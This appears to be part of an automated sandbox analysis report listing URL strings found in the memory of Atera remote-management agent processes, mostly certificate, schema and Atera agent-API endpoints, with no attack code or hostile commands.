                                Source: AteraAgent.exe, 00000010.00000002.2525824499.000002BEFB9F0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBDD2000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2915185997.0000021B6AB60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.cr
                                Source: AteraAgent.exe, 0000000C.00000002.1974508605.0000016E73A60000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527011175.000002BEFBA1C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBEA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crl
                                Source: AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A7E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertTrustedRootG4.crlj
                                Source: AgentPackageUpgradeAgent.exe, 0000002E.00000002.2941460212.000001AF0013C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://packagesstore.blob.core.windows.net
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://poshcode.org/2513
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://poshcode.org/417
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://powershell.com/cs/blogs/tips/archive/2009/02/05/validating-a-url.aspx
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52A88000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5263C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B526C7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52843000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ps.atera.com
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE803B1000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B5263C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ps.pndsn.com
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://pwnt.co
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://rawcdn.githack.com/
                                Source: AteraAgent.exe, 0000000C.00000002.1973450620.0000016E000BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org
                                Source: AteraAgent.exe, 0000000C.00000002.1973450620.0000016E000BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                                Source: AteraAgent.exe, 0000000C.00000002.1973450620.0000016E000BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/System.ServiceProcess
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2377669516.000001D73B882000.00000002.00000001.01000000.00000023.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                                Source: rundll32.exe, 00000004.00000002.1890578145.0000000005071000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1890578145.0000000005114000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80001000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2046712886.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2046712886.0000000004441000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.2186817722.00000167D1E41000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.2186704723.00000280BB201000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B51FF1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2459960372.00000125CBD11000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2459960372.00000125CBF87000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000023.00000002.3066742035.00000154216D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.2366809057.000001D722FDD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000029.00000002.2696202477.00000215A9581000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000029.00000002.2696202477.00000215A97BA000.00000004.00000800.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002E.00000002.2941460212.000001AF00001000.00000004.00000800.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000032.00000002.3071249917.00000277DFDA1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC48114000.00000004.00000800.00020000.00000000.sdmp, AgentPackageInternalPoller.exe, 00000039.00000002.2736724893.000001AA4B910000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2776825181.0000000004951000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2776825181.00000000049F4000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BD71000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://somehwere/something.exe
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://somewhere.com/downloads/Install-WindowsImage.ps1
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://somewhere.com/downloads/Install-WindowsImagex64.ps1
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://somewhere123zzaafasd.invalid
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4F94000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://somewhere123zzaafasd.invalidUAttempting
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://stackoverflow.com/a/13571471/18475
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://stackoverflow.com/questions/265339/whats-the-best-way-to-automate-secure-ftp-in-powershell
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://stackoverflow.com/questions/518181/too-many-automatic-redirections-were-attempted-error-messa
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://stexbar.googlecode.com/files/StExBar-1.8.3.msi
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://stexbar.googlecode.com/files/StExBar64-1.8.3.msi
                                Source: AgentPackageOsUpdates.exe, 00000034.00000002.2789370388.000001FC48141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://westeurope-5.in.applicationinsights.azure.com
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000449E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004850000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004DEE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E0B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000446D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004850000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004DEE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E0B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000446D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org/news/
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004850000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004DEE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E0B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000446D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wixtoolset.org/releases/
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.2375208097.000001D73B5B2000.00000002.00000001.01000000.0000001F.sdmpString found in binary or memory: http://www.abit.com.tw/
                                Source: AteraAgent.exe, 00000010.00000002.2530004307.000002BEFBFAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
                                Source: AteraAgent.exe, 00000010.00000002.2533609714.000002BEFC26F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C54F000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C4F8000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C539000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C50D000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C48B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C4CC000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C475000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C523000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C428000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                Source: AteraAgent.exe, 00000010.00000002.2527011175.000002BEFBA67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
                                Source: AteraAgent.exe, 00000010.00000002.2527011175.000002BEFBA1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-std0
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE807B8000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80682000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE802D2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE803B1000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE802C2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52A88000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B52A7F000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B526C7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B527FF000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B522F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004881000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004E1F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E3C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1975925687.0000016E760AA000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1975152103.0000016E75D10000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000C.00000002.1973450620.0000016E000BA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2525824499.000002BEFB9F0000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2530004307.000002BEFBF00000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2525824499.000002BEFB970000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBE17000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2525824499.000002BEFB97C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80647000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE806BB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBE7E000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2529295221.000002BEFBED8000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBDFE000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2533920469.000002BEFC295000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2527805921.000002BEFBE07000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE8028C000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042D4000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2911371890.0000021B6A7E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://www.gnu.org/
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38C4E1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://www.jeremyskinner.co.uk/2010/03/07/using-git-with-windows-powershell/
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3180140705.000002C3A4D12000.00000002.00000001.01000000.0000004F.sdmpString found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupexitcodes
                                Source: rundll32.exe, 00000004.00000002.1891561818.0000000007A40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                                Source: AteraAgent.exe, 0000001A.00000002.2825307729.0000021B522F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.nlog-project.org/schemas/NLog.xsd
                                Source: AteraAgent.exe, 00000010.00000002.2533609714.000002BEFC26F000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2533920469.000002BEFC295000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ssc.lt/cps03
                                Source: AteraAgent.exe, 0000000C.00000002.1973450620.0000016E000BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.o
                                Source: AteraAgent.exe, 0000000C.00000002.1973450620.0000016E000BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.w3.oh
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BF58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://addons.mozilla.org/firefox/downloads/latest/firessh/addon-289675-latest.xpi?src=dp-btn-prima
                                Source: AgentPackageProgramManagement.exe, 0000003C.00000002.3153901428.000002C39BDFD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 0000003C.00000002.3072832109.000002C38BF54000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://adoptium.net/
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2459960372.00000125CBF87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.P
                                Source: rundll32.exe, 00000004.00000002.1890578145.0000000005114000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2046712886.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2776825181.00000000049F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.aterD
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE802C2000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2046712886.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2046712886.0000000004441000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.2186817722.00000167D1E41000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.2186704723.00000280BB201000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2825307729.0000021B51FF1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2459960372.00000125CBD11000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2459960372.00000125CBEBF000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2459960372.00000125CBF59000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2459960372.00000125CBDA5000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2459960372.00000125CBF87000.00000004.00000800.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000025.00000002.2366809057.000001D722FDD000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000029.00000002.2696202477.00000215A9581000.00000004.00000800.00020000.00000000.sdmp, AgentPackageTicketing.exe, 00000032.00000002.3071249917.00000277DFDA1000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CAF000.00000004.00000020.00020000.00000000.sdmp, AgentPackageInternalPoller.exe, 00000039.00000002.2736724893.000001AA4B910000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2776825181.0000000004951000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000446D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2776825181.00000000049F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004850000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1890578145.0000000005071000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1890578145.0000000005114000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004DEE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E0B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2046712886.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2046712886.0000000004441000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2776825181.0000000004951000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000446D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2776825181.00000000049F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/
                                Source: AgentPackageAgentInformation.exe, 00000029.00000002.2696202477.00000215A97BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Prh
                                Source: AgentPackageAgentInformation.exe, 00000014.00000002.2186817722.00000167D1E41000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.2186704723.00000280BB201000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2459960372.00000125CBEBF000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2459960372.00000125CBF59000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2459960372.00000125CBDA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production
                                Source: rundll32.exe, 00000003.00000003.1834753750.0000000004850000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1890578145.0000000005071000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.1890578145.0000000005114000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1844449479.0000000004DEE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1895265835.0000000004E0B000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE803B1000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000003.1990755362.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2046712886.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.2046712886.0000000004441000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000038.00000003.2676474394.0000000004CAF000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2776825181.0000000004951000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000003.2688648705.000000000446D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003B.00000002.2776825181.00000000049F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80477000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/AcknowledgeCommands
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE800A2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE802C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/AgentStarting
                                Source: AgentPackageAgentInformation.exe, 00000014.00000002.2186817722.00000167D1E41000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000015.00000002.2186704723.00000280BB201000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/CommandResult
                                Source: AgentPackageTicketing.exe, 00000032.00000002.3071249917.00000277DFDA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/CommandResultRecurring/AgentPackageTicketingInstallHelp
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80084000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetCommands
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE800A2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.2498500115.000002BE80112000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetCommandsFallback
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetEnvironmentStatus
                                Source: AteraAgent.exe, 00000010.00000002.2498500115.000002BE80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/GetRecurringPackages
                                Source: AgentPackageInternalPoller.exe, 00000039.00000002.2736724893.000001AA4B910000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/agentMonitoredDevices/ef8472c8-8ede-4877-a4a2-21e52a229
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2459960372.00000125CBF87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/dynamic-fields/
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2459960372.00000125CBD11000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2459960372.00000125CBF87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/dynamic-fields/script-based
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2459960372.00000125CBDA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/guiCommandResult
                                Source: AgentPackageAgentInformation.exe, 00000029.00000002.2696202477.00000215A97BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/recurringCo
                                Source: AgentPackageAgentInformation.exe, 0000001D.00000002.2459960372.00000125CBEBF000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 0000001D.00000002.2459960372.00000125CBF59000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000029.00000002.2696202477.00000215A9581000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000029.00000002.2696202477.00000215A97BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://agent-api.atera.com/Production/Agent/recurringCommandResult
